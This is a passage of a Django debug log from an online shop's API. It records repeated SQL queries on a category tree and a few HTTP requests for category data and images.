"shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 06:38:55,999 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 06:38:56,002 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 06:38:56,006 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 06:38:56,010 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 06:38:56,013 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 06:38:56,020 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 06:38:56,024 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 06:38:56,027 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 06:38:56,033 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 06:38:56,037 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 06:38:56,041 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 06:38:56,049 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 06:38:56,053 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 06:38:56,056 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 06:38:56,059 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 06:38:56,063 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 06:38:56,068 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 06:38:56,071 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 06:38:56,075 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 06:38:56,078 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 06:38:56,085 utils 4252 140031503103744 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 06:38:56,091 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 06:38:56,094 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 06:38:56,098 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 06:38:56,101 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 06:38:56,103 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 06:38:56,106 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 06:38:56,109 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 06:38:56,111 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 06:38:56,113 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 06:38:56,116 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 06:38:56,118 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 06:38:56] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [20/Dec/2019 06:38:57] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [20/Dec/2019 06:38:57] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 DEBUG 2019-12-20 06:39:14,872 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-20 06:39:14,878 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 06:39:14,882 utils 4252 140031732287232 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() [20/Dec/2019 06:39:14] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-20 06:39:14,889 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 06:39:14,893 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 06:39:14,898 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 06:39:14,904 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 06:39:14,908 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 06:39:14,912 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 06:39:14,916 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 06:39:14,920 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 06:39:14,926 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 06:39:14,930 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 06:39:14,933 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 06:39:14,936 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 06:39:14,939 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 06:39:14,944 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 06:39:14,947 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 06:39:14,951 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 06:39:14,954 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 06:39:14,957 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 06:39:14,962 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 06:39:14,965 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 06:39:14,968 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 06:39:14,972 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 06:39:14,976 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 06:39:14,980 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 06:39:14,986 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 06:39:14,990 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 06:39:14,994 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 06:39:14,998 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 06:39:15,003 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 06:39:15,009 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 06:39:15,013 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 06:39:15,017 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", 